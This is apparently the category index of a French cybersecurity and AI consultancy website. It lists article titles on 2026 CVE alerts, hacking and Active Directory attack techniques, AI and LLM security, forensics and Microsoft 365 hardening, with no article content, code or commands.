Expert Cybersécurité & IAv9.0
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident

Alertes CVE

124 articles
CVE-2026-40402 : VM escape Hyper-V use-after-free (CVSS 9.3) CVE-2026-35435 : Azure AI Foundry M365 exploitee (CVSS 8.6) YellowKey : 0-day BitLocker bypass WinRE et GreenPlasma LPE SYSTEM CVE-2026-0073 : RCE zero-click Android ADB (CVSS 9.8) CVE-2026-21877 : RCE CVSS 10.0 critique dans n8n CVE-2026-42823 : escalade CVSS 9.9 Azure Logic Apps CVE-2026-0300 : RCE non-auth Palo Alto PAN-OS (CVSS 9.3) CVE-2026-42945 NGINX Rift : RCE 18 ans dans le module CVE-2026-44194 : RCE root OPNsense via injection de commande CVE-2026-3854 : RCE GitHub Enterprise Server via git push CVE-2026-8111 : SQLi RCE Ivanti Endpoint Manager (8.8) CVE-2026-34486 : RCE non-auth Apache Tomcat Tribes (cluster) CVE-2026-8043 : Ivanti Xtraction lecture/écriture web CVE-2026-26083 : RCE non-auth FortiSandbox via Web UI CVE-2026-42897 : zero-day Exchange OWA exploité en XSS CVE-2026-40365 : RCE SharePoint 2019 par désérialisation CVE-2026-42898 : RCE Dynamics 365 on-prem (CVSS 9.9) CVE-2026-40361 : RCE Outlook zero-click via DLL Word CVE-2026-31431 Copy Fail : LPE root noyau Linux (KEV) CVE-2026-20182 : auth bypass Cisco SD-WAN exploité (10.0) CVE-2026-44277 : RCE non-auth FortiAuthenticator (9.1) CVE-2026-32202 : zero-click NTLM Windows exploité par APT28 CVE-2026-41103 : SAML SSO Jira/Confluence forgeable CVE-2026-41940 : 44 000 serveurs cPanel compromis (CVSS 9.8) CVE-2026-34260 : SQLi critique SAP S/4HANA Enterprise (9.6) CVE-2026-41096 : RCE Windows DNS Client (CVSS 9.8) CVE-2026-41089 : RCE Netlogon domain controller (9.8) CVE-2026-43899 et 43900 : RCE DeepChat via agent IA piégé CVE-2026-45321 Mini Shai-Hulud : 170+ paquets npm compromis CVE-2026-43284 Dirty Frag : LPE root noyau Linux (PoC CVE-2026-42302 : RCE non-auth FastGPT agent-sandbox (9.8) CVE-2026-27960 : OpenCTI takeover non-auth via API GraphQL CVE-2026-42605 : RCE AzuraCast path traversal upload (8.8) CVE-2026-7896 : RCE critique Chrome Blink integer overflow CVE-2026-42354 : prise de compte Sentry via SAML SSO (9.1) CVE-2026-42569 : bypass auth phpVMS import legacy (CVSS 9.4) CVE-2026-37709 : RCE critique Snipe-IT via upload (9.8) CVE-2026-42454 : RCE critique Termix via containerId (9.9) CVE-2026-42208 : SQL injection LiteLLM proxy IA au KEV CVE-2026-43997 : vm2 sandbox escape RCE (CVSS 10.0) CVE-2026-6973 : Ivanti EPMM zero-day RCE actif au KEV CVE-2026-0300 : RCE root PAN-OS Captive Portal exploité CVE-2026-1603 : Ivanti EPM auth bypass exploité (CVSS 8.6) CVE-2026-0625 : RCE D-Link DSL EoL exploité (CVSS 9.3) CVE-2026-23918 : RCE Apache HTTP/2 double-free (CVSS 8.8) CVE-2026-42796 : Arelle RCE non-auth via plugin loading CVE-2026-42809 : Apache Polaris credential vending RCE (9.9) CVE-2026-42369 : GeoVision GV-VMS V20 RCE SYSTEM (CVSS 10.0) CVE-2026-39808 : FortiSandbox RCE non-auth (CVSS 9.8) CVE-2025-53521 : F5 BIG-IP APM RCE non-auth au KEV CISA CVE-2026-3854 : RCE GitHub Enterprise via git push CVE-2026-0488 : SQL injection SAP S/4HANA CRM (CVSS 9.9) CVE-2026-21858 Ni8mare : RCE non-auth n8n (CVSS 10.0) CVE-2026-31431 Copy Fail : LPE root quasi-universelle Linux CVE-2026-42779 : RCE Apache MINA via deserialization (9.8) CVE-2026-1281 : Ivanti EPMM RCE pré-auth Bash (CVSS 9.8) CVE-2025-66376 : Zimbra XSS UAC-0233 Ukraine au KEV CVE-2024-1708 : ConnectWise ScreenConnect Medusa KEV CVE-2026-32202 : Windows Shell zero-click APT28 exploité cPanel/WHM : faille auth critique patchée en urgence CVE-2026-7248 : RCE pré-auth D-Link DI-8100 (CVSS 9.8) CVE-2026-33824 : Windows IKE wormable RCE (CVSS 9.8) CVE-2026-33827 : RCE Windows TCP/IP via race condition CVE-2025-62373 : RCE Pipecat agents IA voix (pickle) CVE-2026-33725 : RCE Metabase Enterprise via H2 JDBC CVE-2026-32157 : RCE Remote Desktop Client Microsoft CVE-2026-6951 : RCE critique simple-git npm (CVSS 9.8) CVE-2025-2749 : RCE Kentico Xperience inscrite au KEV CISA CVE-2026-34621 : Adobe Acrobat zero-day PDF exploité 4 mois CVE-2026-35616 : FortiClient EMS API auth bypass exploité CVE-2026-33032 : nginx-ui auth bypass exploitée (CVSS 9.8) CVE-2024-57726 : SimpleHelp RMM exploitée par DragonForce CVE-2024-7399 : Samsung MagicINFO 9 ajoutée au KEV CISA CVE-2026-39987 : RCE pré-auth Marimo exploitée en 10h CVE-2026-40372 : EoP signature ASP.NET Core (CVSS 9.1) CVE-2026-33519 : Esri Portal ArcGIS auth bypass (9.8) CVE-2026-33825 : zero-day Defender BlueHammer au KEV CVE-2026-21571 : injection commande Atlassian Bamboo (9.4) CVE-2026-40575 : bypass auth OAuth2 Proxy (CVSS 9.1) CVE-2026-32201 : zero-day SharePoint exploité en nature CVE-2023-27351 : PaperCut NG bypass auth ajouté au KEV CVE-2025-32975 : Quest KACE SMA bypass auth (CVSS 10) CVE-2026-5760 : RCE via GGUF malveillant dans SGLang (9.8) CVE-2026-32604 : RCE critique Spinnaker Gitrepo (9.9) Cisco SD-WAN Manager : 3 failles ajoutees au KEV CISA CVE-2026-40478 : bypass sandbox Thymeleaf vers SSTI (9.1) CVE-2026-40493 : heap overflow critique librairie SAIL CVE-2026-3584 : RCE critique Kali Forms WordPress (9.8) CVE-2026-34197 : RCE Apache ActiveMQ Jolokia ajoutée au KEV CVE-2026-40477 : SSTI critique Thymeleaf vers RCE Java CVE-2026-35546 : firmware non auth Anviz CX2/CX7 (RCE 9.8) CVE-2026-20180 : RCE critique Cisco ISE (CVSS 9.9) CVE-2026-33826 : RCE Active Directory via RPC (8.0) CVE-2026-39808 : RCE non auth FortiSandbox (CVSS 9.8) CVE-2026-33827 : RCE critique Windows TCP/IP via IPv6 (9.8) CVE-2026-27681 : injection SQL critique SAP BPC/BW (9.9) CVE-2026-33824 : RCE critique Windows IKE Service (9.8) CVE-2026-22564 : accès SSH non autorisé UniFi Play (9.8) CVE-2025-60710 : élévation de privilèges Windows (KEV) CVE-2026-24061 : bypass auth root dans GNU telnetd (9.8) CVE-2026-34179 : escalade de privilèges critique dans LXD CVE-2026-21902 : RCE root pré-auth sur Juniper PTX (9.8) CVE-2026-5059 : injection de commande critique aws-mcp CVE-2026-22719 : injection de commande VMware Aria (KEV) CVE-2026-3055 : Citrix NetScaler SAML fuite mémoire (9.3) CVE-2026-34621 : zero-day critique Adobe Acrobat Reader CVE-2026-3502 : zero-day TrueConf exploité par la Chine CVE-2026-40175 : Axios Prototype Pollution RCE [Critique] CVE-2026-39987 : RCE pré-authentification dans Marimo (9.3) CVE-2026-23818 : vol de credentials HPE Aruba 5G (8.8) CVE-2026-21643 : injection SQL critique FortiClient EMS CVE-2026-1281 : RCE zero-day critique dans Ivanti EPMM (9.8) CVE-2026-1346 : escalade root dans IBM Verify Access (9.3) CVE-2026-25776 : injection Perl critique dans Movable Type CVE-2026-39888 : RCE critique PraisonAI sandbox escape (9.9) CVE-2026-39846 : RCE via synchronisation SiYuan (CVSS 9) CVE-2026-21992 : RCE critique Oracle Identity Manager BlueHammer : Analyse zero-day Windows Defender 2026 Cisco IMC et SSM : deux failles critiques CVSS 9.8 corrigées CVE-2026-35616 : faille critique FortiClient EMS exploitée CVE du Mois Juin 2025 : Vulnérabilités Critiques Analysées CVE-2026-21413 : RCE critique dans Microsoft Outlook CVE-2026-3094 : injection SQL critique dans GitLab CE/EE CVE-2026-1723 : RCE dans Linux kernel via Netfilter

Cybermalveillance

16 articles
Registre des Incidents de Sécurité NIS2/RGPD (Template PDF) Ai-je Été Piraté ? Arbre de Décision (PDF Imprimable) Calendrier Annuel des Sauvegardes IT (PDF Imprimable) Sécuriser son Smartphone : 15 Mesures Ado et Senior Anatomie d'un Faux SMS : Guide Visuel Anti-Arnaque Comparatif Gestionnaires de Mots de Passe 2026 (PDF) J'ai Cliqué sur un Lien Suspect : Que Faire Immédiatement Politique Mots de Passe Entreprise : Règles et Modèle (PDF) Checklist Départ Salarié : Sécurité IT Complète (PDF) Modèle Notification CNIL : Violation de Données (PDF) Checklist Sécurité PME : 20 Mesures Essentielles (PDF) Plan de Réponse à Incident Cyber : Modèle 1 Page (PDF) Fiche Réflexe Arnaque au Président FOVI : Que Faire (PDF) Modèle de Charte Informatique Entreprise (PDF/DOCX Gratuit) Fiche Réflexe Phishing : Reconnaître un Email Suspect Fiche Réflexe Ransomware : 10 Étapes Immédiates (PDF)

Techniques de Hacking

51 articles
Attaques SAML 2026 : Golden SAML, XSW & Défense IdP Pentest Interne 2026 : Méthodologie & Livrables PASSI Pentest Cloud AWS Avancé 2026 : IMDSv1 + IAM PrivEsc AWS Pentesting 2026 : Pacu, ScoutSuite, Prowler v4 DMA FireWire & Thunderbolt 2026 : Inception, PCILeech Pentest Externe 2026 : Black-Box ou Gray-Box, Guide Pentest Entreprise 2026 : Méthodologie & Rapport Type EBIOS RM 2026 : Guide Complet Méthode ANSSI [5 Ateliers] Burp Suite : Pentest Web et API par PortSwigger 2026 Race Condition : Faille, Attaque et Défense - Guide 2026 Désérialisation Insécurisée : Bonnes Pratiques 2026 XXE : XML External Entity — Exploitation et Défense Élévation de Privilèges Linux : SUID, Capabilities et Kernel Élévation de Privilèges Windows : Techniques Avancées SSRF : Server-Side Request Forgery — Exploitation Avancée Désérialisation : Attaques Java, PHP, .NET et Python LOLBas / LOLBins : Living Off The Land — Guide Complet NoSQL Injection : MongoDB, Redis, Cassandra — Guide Expert IDOR : Exploitation et Défense des Références Directes Bettercap & Ettercap : Guide MITM et Pentest Réseau Web Cache Poisoning & Deception : Exploitation et Défense ETW Tampering : Évasion et Détection sur Windows en 2026 TPM et BitLocker : Cold Boot et Bypass Chiffrement Covert Channels Réseau : Stéganographie et Exfiltration eBPF Offensif : Rootkits, Évasion et Détection Kernel-Level DMA Attacks : Exploitation Thunderbolt, PCIe et FireWire Type Confusion V8 : Exploitation Avancée Navigateurs Vol de Mots de Passe Chrome : DPAPI, Exploits et Outils Extraction Credentials Firefox : NSS, Key4.db et Exploits Hacking Password Managers Navigateurs : Attaques Expert EvilGinx 2026 : Phishing AiTM, Bypass MFA & Défense SOC Persistance Windows Server 2025 : Techniques Complètes Escalade de Privilèges Windows 2025 : Scénarios Réels Buffer Overflow et Corruption Mémoire : Stack et Heap Escalade de Privilèges Linux : Techniques Offensives Escalade de Privilèges Windows : Du User au SYSTEM Hacking WordPress Expert : Red Team et Supply Chain Hacking WordPress : Fondamentaux, Vulnérabilités : Guide Hacking WordPress Intermédiaire : Exploitation Avancée Infostealers : La Menace Silencieuse des Cybercriminels Injection SQL Avancée : De la Détection à l'Exploitation MITRE ATT&CK : Les 10 Techniques les Plus Utilisées OSINT et Reconnaissance Offensive : Du Renseignement Password Attacks : Cracking, Spraying et Credential Stuffing Ransomware : Anatomie, Kill Chain et Réponse Incident Reverse Engineering et Analyse de Malware : Guide Pratique Red Team vs Pentest vs Bug Bounty : Comparatif Complet Bug Bounty : Créer et Gérer un Programme de Sécurité Zero Trust Architecture : Implémentation et Pratique Mouvement Latéral : Techniques d'Attaque et Détection Attack Surface Management (ASM) : Gestion Continue

Attaques Active Directory

58 articles
NTLM 2026 : Histoire, Vulnérabilités, Migration Kerberos Golden Ticket : Attaque Kerberos Domain Admin Persiste Silver Ticket : Attaque Kerberos Service Active Directory DCSync : Attaque de Réplication Active Directory 2026 Pass-the-Hash : Attaque NTLM Active Directory 2026 Active Directory : annuaire Microsoft, securite 2026 MITRE ATT&CK 2026 : Framework TTPs, Tactiques et Techniques Mimikatz : Extraction Credentials Active Directory Cobalt Strike : Plateforme C2 Red Team de Reference BloodHound : Cartographier les Attaques Active Directory Glossaire Active Directory : 100 Termes Sécurité et Attaques PrintNightmare : Exploitation et Compromission sur AD Responder : Guide Complet pour le Pentest Active Directory Sécuriser Active Directory : Le Guide Définitif 2026 Adalanche — Audit Active Directory Open Source Complet Mouvement Latéral Windows AD 2026 : Techniques Expert Impacket : Guide complet exploitation Active Directory 2026 Pentest Active Directory : Guide Méthodologique Complet 2026 BloodHound : Cartographie des Chemins d'Attaque Active NTDS.dit : Extraction, Analyse et Protection des Secrets LAPS : Gestion Sécurisée des Mots de Passe : Guide Complet Tiering Model Active Directory : Segmentation des : Guide GPO Sécurisation Active Directory : Hardening par : Guide Forum InCyber 2026 : Sécurité AD en Vedette : Guide Complet Conditional Access Entra ID : Nouveautes Mars 2026 Attaques ADCS 2026 : ESC1 à ESC15, Exploitation & Defense BloodHound 5 : Nouveaux Chemins d'Attaque Detectes Audit AD Automatise PowerShell : Scripts 2026 en 2026 NTLM Relay 2026 : Techniques et Defenses Actuelles Tiering Model AD 2026 : Adapter Face aux Menaces en 2026 Passwordless AD : Bilan des Risques et Opportunites Entra ID : Fin des Service Principals Legacy : Guide Complet BadSuccessor DMSA : Compromettre Active Directory en 2026 Attaques SAML & ADFS 2026 : Golden SAML, Vulnérabilités RBCD Abuse : Délégation Contrainte Active Directory Computer Account Takeover Active : Analyse Technique Active Directory Certificate Services : Guide Complet Forest Trust Abuse Active | Defence Active Directory ACL Abuse Active Directory : Exploitation Méthodique AS-REP Roasting : Exploitation et Défense Active Directory Kerberoasting Active Directory : Attaque et Défense 2026 Password Filter DLL : Attaque, Détection et Défense 2026 Pass-the-Hash : Comprendre l'Attaque et la Défense AdminSDHolder : Persistance et Abus Active Directory Pass-the-Ticket Active Directory : : Guide Complet NTFS Tampering et Anti-Forensics : Analyse Technique GPO Abuse Active Directory : Escalade de Privilèges SIDHistory Injection Active Directory : Guide Complet Skeleton Key Malware : Persistence Active Directory Silver Ticket Active Directory : Analyse Technique DCSync Attack : Exfiltration Hashes NTDS Active Directory DCShadow : Attaque Furtive et Persistance sur l'AD Golden Ticket Attack : Attaque, Détection et Défense 2026 Migration MFA Entra : Revoquer les Sessions Legacy Attaques AD 2025 : Bilan et Tendances Emergentes en 2026 Entra Connect SyncJacking : Bloquer l'Attaque en 2026 CVE-2025-21293 : Escalade de Privileges AD DS en 2026 Durcissement AD : Guide des Recommandations Microsoft

Intelligence Artificielle

192 articles
Protocole MCP — le nouveau standard des agents IA 2026 Hallucinations LLM — causes fondamentales et solutions 2026 Systèmes multi-agents autonomes — architecture et risques RAG scalable — architectures, problèmes et alternatives 2026 vLLM vs Ollama vs TGI vs SGLang — benchmark serveurs LLM Optimisation cluster GPU pour l'inférence LLM en production Quantization LLM : Comparaison GPTQ, AWQ, EXL2, GGUF Souveraineté IA : pourquoi les entreprises rapatrient YaraGen-AI : Générer Règles YARA avec LLM Open Source Benchmark LLM : Classement Complet GPT-5, Claude, Gemini LangChain : Framework LLM, RAG, Agents Python 2026 vLLM : Moteur d'Inférence LLM Haute Performance 2026 Hugging Face : Hub IA, Transformers, Datasets 2026 OpenAI : Vendor IA ChatGPT, GPT-5, API Enterprise 2026 Anthropic : Claude, Constitutional AI, MCP, Computer Use Guide GEO/LLMO 2026 : citer ChatGPT, Claude, Perplexity LM Studio vs Ollama : Le Comparatif LLM Local 2026 Intégrer une API LLM en Fonction IA : Guide Tutoriel 2026 AWQ Quantization : Optimiser les LLM en INT4 sans perte Pentest IA : Audit des Systèmes d'Intelligence Artificielle Tokenization vs Embedding : Différences et Usage en IA Orchestration Multi-Agents IA : LangGraph, CrewAI, AutoGen Fine-Tuning LoRA et QLoRA : Guide Pratique LLM 2026 GraphRAG : Knowledge Graph + RAG — Guide Architecture Bases de Données Vectorielles : Comparatif Complet 2026 AWQ vs GPTQ 2026 : Quantization LLM Comparé [VRAM 75%] Qdrant vs Milvus vs Weaviate : bases vectorielles RAG Jailbreak LLM : Taxonomie et Détection Automatisée Sécuriser un Pipeline RAG : Du Vector Store à l'API Exfiltration de Données via RAG : Attaques Contextuelles AI Red Team : Auditer un Modèle IA en Production 2026 Prompt Injection Avancée : Attaques et Défenses 2026 La Puce Analogique que les États-Unis ne Peuvent Arrêter Contenu IA : Outils de Detection Proactive Multimodale Prompt Injection et Attaques Multimodales : Défenses en 2026 Stocker et Interroger des Embeddings à Grande Échelle Benchmark LLM Mars 2026 : Etat des Lieux Complet en 2026 Claude Opus 4.6 : Applications en Cybersécurité en 2026 AI Worms et Propagation Autonome : Menaces Émergentes 2026 Confidential Computing et IA : Entraîner en Sécurité IA Générative pour le Pentest Automatisé : Méthodes IA et Gestion des Vulnérabilités : Priorisation EPSS Long Context vs RAG : Quand Utiliser 10M Tokens au Lieu Mixture of Experts (MoE) : Architecture et Sécurité AI Model Supply Chain : Attaques sur Hugging Face Hub IA et SCADA/ICS : Détection d'Anomalies sur les Protocoles Sparse Autoencoders et Interprétabilité Mécanistique IA et Zero Trust : Micro-Segmentation Dynamique par LLM Red Teaming IA 2026 : Tester les LLM en Entreprise MCP Model Context Protocol : Securiser les Agents en 2026 AI Act 2026 : Implications pour les Systèmes Agentiques Context Engineering pour Agents Multimodaux : Guide Complet Défense contre les Attaques IA Générées : Stratégies Détection Proactive de Contenu Généré par IA Multimodal Embodied AI : Agents Physiques, Robotique et Sécurité Forensic Post-Hacking : Reconstruction et IA : Guide Complet Gouvernance Globale de l'IA 2026 : Alignement International Gouvernance du Hacking IA Offensive : Cadre et Bonnes Pra... Green Computing IA 2026 : Eco-Responsabilite et Sobriete Hacking Assisté par IA : Génération de Payloads LLM Human-AI Collaboration 2026 : Travailler avec des Agents Intégration d'Agents IA avec les API Externes en 2026 LLMOps pour Agents Autonomes : Monitoring et CI/CD Mémoire Augmentée Agents : Vector + Graph 2026 en 2026 Détection Multimodale d'Anomalies Réseau par IA : Guide Multimodal RAG 2026 : Texte, Image, Audio : Guide Complet PLAM : Agents IA Personnalisés Edge et Déploiement Prompt Hacking Avancé 2026 : Techniques et Défenses Prompt Injection et Attaques Multimodales : Défenses Red Teaming Cyber-Défense Agentique : Méthodologie Responsible Agentic AI : Contrôles, Garde-Fous et 2026 Agents RAG avec Actions : Récupération et Exécution Sécurité des Agents IA en Production : Sandboxing LLM Shadow Agents IA : Identification et Gouvernance 2026 Traçabilité des Décisions d'Agents Autonomes : Guide Agentic AI 2026 : Autonomie en Entreprise : Guide Complet Agents IA et Raisonnement Causal pour la Décision 2026 Agents IA Edge 2026 : Privacy, Latence et Architecture PLAM Architectures Multi-Agents et Orchestration LLM en Produc... Collaboration Multi-Agents IA 2026 : Orchestration RAG Agentique : Pipelines IA Autonomes en Entreprise IA et Analyse Juridique des Contrats Cybersécurité Apprentissage Fédéré et Privacy-Preserving ML en 2026 IA pour la Défense et le Renseignement : Cadre Éthique Données Synthétiques : Génération, Validation et 2026 DSPy et la Programmation Déclarative de LLM : Guide IA dans la Finance : Détection de Fraude et Temps Réel Gouvernance LLM et Conformite : RGPD et AI Act 2026 Playbooks de Réponse aux Incidents IA : Modèles SOAR IA Neuromorphique : Architecture et Sécurité en 2026 Pydantic AI et les Frameworks d'Agents Type-Safe en 2026 Quantum Machine Learning : Risques pour la Cryptographie RAG en Production : Architecture, Scaling et Bonnes Reinforcement Learning Appliqué à la Cybersécurité AI Safety et Alignement : Du RLHF au Constitutional AI IA dans la Santé : Sécuriser les Modèles Diagnostiques Sécurité LLM Adversarial : Attaques, Défenses et Bonnes Speculative Decoding et Inférence Accélérée : Techniques Voice Cloning et Audio Deepfakes : Detection en 2026 IA Agentique 2026 : Risques et Gouvernance : Guide Complet Agents IA Autonomes : Architecture, Frameworks et Cas Automatiser le DevOps avec des Agents IA : Guide Complet Agents IA pour le SOC : Triage Automatisé des Alertes AI Act et LLM : Classifier vos Systèmes IA : Guide Complet AI TRiSM : Framework Gartner Appliqué : Guide Complet IA pour l’Analyse de Logs et Détection d’Anomalies IA et Automatisation RH : Screening CV et Compliance Chatbot Entreprise avec RAG et LangChain : Guide Pas à Pas Comparatif LLM Open Source 2026 : Llama 4, Mistral, Qwen Computer Vision en Cybersécurité : Détection et 2026 Confidentialité des Données dans les LLM : PII et DLP IA et Conformité RGPD : Données Personnelles dans les LLM Context Window : Gérer 1 Million de Tokens en Production Coût d'Inférence des LLM : Optimiser sa Facture Cloud CrewAI, AutoGen, LangGraph : Comparatif Frameworks Data Platform IA-Ready : Architecture de Référence 2026 Data Poisoning et Model Backdoors : Supply Chain IA Deepfakes et Social Engineering IA : Détection et 2026 Deployer des LLM en Production : GPU et Optimisation Détection de Menaces par IA : SIEM Augmenté & UEBA 2026 IA pour le DFIR : Accélérer les Investigations Forensiques Évaluation LLM 2026 : Benchmarks MMLU, GPQA, HumanEval Fine-Tuning LLM 2026 : LoRA, QLoRA, DPO [Guide Pratique] Function Calling et Tool Use : Intégrer les API aux LLM Fuzzing Assisté par IA : Découverte de Vulnérabilités IA pour la Génération de Code : Copilot, Cursor, Claude Gouvernance IA en Entreprise : Politiques et Audit GraphRAG 2026 : Knowledge Graph + RAG, Guide Complet Knowledge Management avec l’IA en Entreprise : Stratégies Kubernetes pour l’IA : GPU Scheduling, Serving et 2026 LLM en Local 2026 : Ollama vs LM Studio vs vLLM [RGPD] LLM On-Premise vs Cloud 2026 : Coûts, RGPD, Performance MCP (Model Context Protocol) : Connecter les LLM à vos MLOps Open Source : MLflow, Kubeflow, ZenML : Guide Complet IA Multimodale : Texte, Image et Audio : Guide Complet IA Offensive : Comment les Attaquants Utilisent les LLM Orchestration d'Agents IA : Patterns et Anti-Patterns OWASP Top 10 pour les LLM : Guide Remédiation 2026 Phishing Généré par IA : Nouvelles Menaces : Guide Prompt Engineering Avancé : Chain-of-Thought et Techniques Quantization : GPTQ, GGUF, AWQ - Quel Format Choisir RAG vs Fine-Tuning vs Prompt Engineering : Quelle Stratégie Reconnaissance Vocale et LLM : Assistant Vocal Sécurisé Red Teaming de Modèles IA : Jailbreak et Prompt Injection ROI de l'IA Générative : Mesurer l'Impact Réel en 2026 Sécuriser un Pipeline MLOps : Bonnes Pratiques et 2026 Shadow AI : Détecter et Encadrer l'Usage Non Autorisé Small Language Models : Phi-4, Gemma et IA Embarquée Threat Intelligence Augmentée par IA : Guide Complet Vector Database en Production : Scaling et HA en 2026 CNIL Autorite AI Act : Premiers Pas Reglementaires KVortex : Offloader VRAM→RAM pour LLMs vLLM et Inférence Securiser un Pipeline RAG en Production (2026) en 2026 Codex GPT-5.2 : Generation de Code Autonome Securisee Mixture of Experts : Architecture LLM de 2026 en 2026 GPT-5.2 et Agents IA : Revolution en Cybersécurité Windows Recall : Analyse Technique Complete - Fonctionnem... L'IA dans Windows 11 : Copilot, NPU et Recall - Guide Com... Deepfake-as-a-Service : La Fraude IA Industrialisee Small Language Models : Sécurité a la Peripherie en 2026 RAG Poisoning : Manipuler l'IA via ses Documents en 2026 Phishing IA : Quand les Defenses Traditionnelles Echouent Superintelligence ASI : De l'IA Faible à la Singularité La Fin des Moteurs de Recherche : Analyse Expert 2026 Embeddings et Recherche Documentaire : Guide Complet Stratégies de Découpage Réseau : Guide Expert 2026 Sécurité et Confidentialité des : Analyse Technique Vecteurs en IA 2026 : Embeddings, RAG et Bases Vectorielles Embeddings vs Tokens : Comparatif pour les LLM 2026 Qu'est-ce qu'un Embedding : Guide IA Complet 2026 (50c) Cas d'Usage des Bases de Données : Guide IA Complet Bases Vectorielles : Définition : Guide IA Complet 2026 Vectorisation de Données IA 2026 : 7 Techniques + Code Tendances Futures des Embeddings : Analyse Technique Chunking RAG 2026 : 7 Stratégies pour Optimiser vos Milvus, Qdrant, Weaviate : Bases Vectorielles 2026 Glossaire IA & Cybersécurité 2026 : 350+ Termes Définis 10 Erreurs Courantes dans Active Directory : Guide Benchmarks de Performance : Guide IA Complet 2026 (50c) RAG en 2026 : Guide Architecture, Vectorisation & Chunking Choisir sa Base de Données IA : Guide Comparatif 2026 Indexation Vectorielle : Techniques : Guide Complet Comprendre la Similarité Cosinus : Analyse Technique Comet Browser : Analyse Architecture & Sécurité 2026 Développement Intelligence Artificielle | : Guide Complet Stocker et Interroger les Données Vectorielles : Guide IA Shadow AI en Entreprise : Detecter et Encadrer en 2026 GPT-5.1 vs Claude 4.5 vs Gemini 3 : Comparatif en 2026 OpenClaw : Crise de l'Agent IA Open Source : Guide Complet Prompt Injection : 73% des Deploiements Vulnerables AI Act Aout 2025 : Premieres Sanctions Activees en 2026 OWASP Top 10 LLM 2025 : Risques et Remediations en 2026

Sécurité IA

21 articles
Programme Shadow AI : Guide Gouvernance RSSI 2026 (50c) Shadow AI en entreprise — détecter les usages cachés de l'IA Attaques LLM en 2026 : Guide Tactiques Cybercriminels LLM et reverse engineering : analyse malware automatique LLM et analyse Wireshark — automatiser l'analyse réseau Agent IA pour auditer Active Directory — guide complet Détection des deepfakes vocaux en entreprise — ML et DSP Vulnérabilités des copilotes IA d'entreprise — audit SOC Augmenté par IA : SIEM, LLM et SOAR — Guide 2026 Attaques RAG : empoisonnement vectoriel et retrieval Red Teaming LLM On-Premise : Méthodologie Avancée (55c) GCG Adversarial Suffix : Jailbreak Universel LLM 2026 Multi-Turn Jailbreaks 2026 : Crescendo & Skeleton Key Indirect Prompt Injection 2026 : Empoisonner un RAG LLM LLM Model Extraction 2026 : Voler un GPT-4 via API Membership Inference Attacks LLM 2026 : Vol Donnees ML Supply Chain 2026 : Backdoors HF & Pickle RCE LLM GPU Side-Channel sur LLM Inference 2026 : Timing Attacks Agent IA Jailbreak 2026 : MCP & Tool Injection LLM Vector DB Poisoning 2026 : Pinecone, Weaviate, Qdrant Adversarial Patches 2026 : VLM GPT-4V, Claude, Gemini

Forensics

34 articles
NTLM Relay 2026 : Attaque Moderne et Défense [Guide] Kerberoasting 2026 : Attaque, Détection et Défense AD Volatility 3 : Framework Forensics Mémoire Open Source 2026 Forensique Mémoire : Guide Pratique Volatility 3 en 2026 Timeline Forensique : Reconstituer Pas à Pas une : Guide Forensique Cloud : Analyser les Logs CloudTrail, Azure Forensique Microsoft 365 : Analyse du Unified Audit Log Chaîne de Preuve Numérique : Bonnes Pratiques Juridiques Exercice de Crise Cyber : Organiser un Tabletop Efficace Forensique Disque : Acquisition d'Image et Analyse Mobile Forensics : Extraction et Analyse iOS/Android Ransomware Forensics : Identifier la Souche : Guide Complet Forensics Linux : Artifacts et Investigation : Guide Complet MacOS Forensics : Artifacts et Persistence : Guide Complet Malware Reverse : Analyse de Cobalt Strike 5 : Guide Complet Email Forensics : Tracer les Campagnes Phishing en 2026 Timeline Analysis : Reconstruction d'Incidents en 2026 Registry Advanced : Guide Expert Analyse Technique NTFS Forensics : Methodologie et Recommandations de Sécurité LNK & Jump Lists : Strategies de Detection et de Remediation Windows Forensics : Guide Expert en Analyse Sécurité Registry Forensics : Guide Expert Analyse Sécurité Windows Server 2025 : Guide Complet Forensic & Incident Memory Forensics : Strategies de Detection et de Remediation ETW & WPR : Guide Complet et Bonnes Pratiques pour Experts Modèles de Rapports Forensic : Templates Windows Server Comparatif des Outils DFIR Cybersécurité : Guide 2026 AmCache & ShimCache : Forensique Windows — Expert 2026 Telemetry Forensics : Analyse Avancée Windows Server Anti-Forensics : Methodologie et Recommandations de Sécurité NTFS Advanced : Methodologie et Recommandations de Sécurité Network Forensics : Analyse PCAP Avancee : Guide Complet DFIR Cloud : Investigation Logs AWS CloudTrail en 2026 Memory Forensics 2026 : Volatility 3 Avance : Guide Complet

Microsoft 365

27 articles
Durcissement Linux 2026 : Guide Hardening CIS Benchmark Microsoft 365 : Suite Cloud Sécurité Conformité 2026 Chronologie des Attaques Active Directory : 2014-2026 Audit Avancé Microsoft 365 : Corréler Journaux et Logs Azure Automatiser l'Audit Sécurité Microsoft 365 : Guide Expert API Microsoft Graph : Audit et Monitoring M365 en 2026 Meilleures Pratiques Sécurité Microsoft 365 en 2026 PIM Entra ID : Gestion des Accès Privilégiés Just-in-Time Sécuriser Microsoft Teams : Gouvernance, DLP et Contrôle SharePoint et OneDrive : Maîtriser le Partage Externe Microsoft Defender for Office 365 : Configuration : Guide Microsoft Secure Score : Guide d'Optimisation de votre Sécuriser Microsoft Entra ID : Conditional Access, MFA Durcissement Exchange Online : Bloquer Basic Auth MFA Microsoft Intune : Politiques de Conformité et : Guide Shadow IT & OT 2026 : Détection Wireshark [Guide Terrain] Zero Trust M365 : Strategies de Detection et de Remediation API Microsoft Graph M365 : Guide Audit Sécurité 2026 Microsoft 365 et Conformité : Guide Audit Sécurité 2026 Audit Sécurité Microsoft 365 | Guide Microsoft 365 Audit Avancé Microsoft 365 : Guide Audit Sécurité 2026 Pratiques Sécurité M365 2025 | Guide Microsoft 365 Microsoft 365 et Azure : Attaque, Détection et Défense 2026 Threat Hunting Microsoft 365 | Guide Microsoft 365 Top 10 Outils Analyse Sécurité Microsoft 365 — Guide Automatiser l'Audit de Sécurité : Analyse Technique Sécuriser les Accès Microsoft | Guide Microsoft 365

Virtualisation

31 articles
